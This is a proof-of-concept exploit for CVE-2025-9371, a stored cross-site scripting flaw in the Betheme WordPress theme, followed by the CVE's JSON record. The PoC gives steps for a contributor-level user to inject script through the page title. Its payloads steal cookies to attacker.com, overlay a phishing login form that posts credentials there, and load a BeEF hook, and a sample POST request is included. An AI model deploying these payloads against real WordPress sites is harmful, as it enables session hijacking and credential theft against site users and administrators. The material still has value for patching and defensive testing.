CVE-2025-9371

<!-- CVE-2025-9371 PoC - Betheme Stored XSS via page_title parameter Vulnerability: Stored Cross-Site Scripting in Betheme WordPress Theme Affected versions: <= 28.1.6 Required access: Contributor-level or above --> <!-- Step 1: Login as Contributor-level user Step 2: Create a new page/post Step 3: Set the page_title (or post title) with malicious payload Step 4: Submit for review (or get it published) Step 5: When any user visits the page, the XSS payload executes --> <!-- Malicious page_title payload examples: --> <!-- Payload 1: Cookie stealing --> <script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script> <!-- Payload 2: Admin session hijacking via image --> <img src=x onerror="var i=new Image();i.src='https://attacker.com/log?d='+document.cookie;"> <!-- Payload 3: Fake login form overlay --> <script>document.write('<form action="https://attacker.com/phish" method=POST><input name=username placeholder=Username><input name=password type=password placeholder=Password><button>Login</button></form>');</script> <!-- Payload 4: BeEF hook injection --> <script src="https://attacker.com:3000/hook.js"></script> <!-- Note: The payload is injected into the page_title field which is then rendered unsanitized in the Betheme breadcrumbs navigation component. --> <!-- Example HTTP request to create a malicious page (simplified): --> <!-- POST /wp-admin/post-new.php HTTP/1.1 Host: target-wordpress-site.com Content-Type: application/x-www-form-urlencoded Cookie: wordpress_logged_in_xxx=xxx post_title=<script>alert(document.cookie)</script>&post_content=test&post_status=publish&... -->

{"cve": {"id": "CVE-2025-9371", "sourceIdentifier": "[email protected]", "published": "2025-10-09T12:15:35.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Betheme theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘page_title’ parameter in all versions up to, and including, 28.1.6 due to insufficient input sanitization and output escaping of theme breadcrumbs. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://themeforest.net/item/betheme-responsive-multipurpose-wordpress-theme/7758048#item-description__version-28-1-7-september-3rd-2025", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9da9d45-39e2-4b07-baed-1f7d7f67602e?source=cve", "source": "[email protected]"}]}}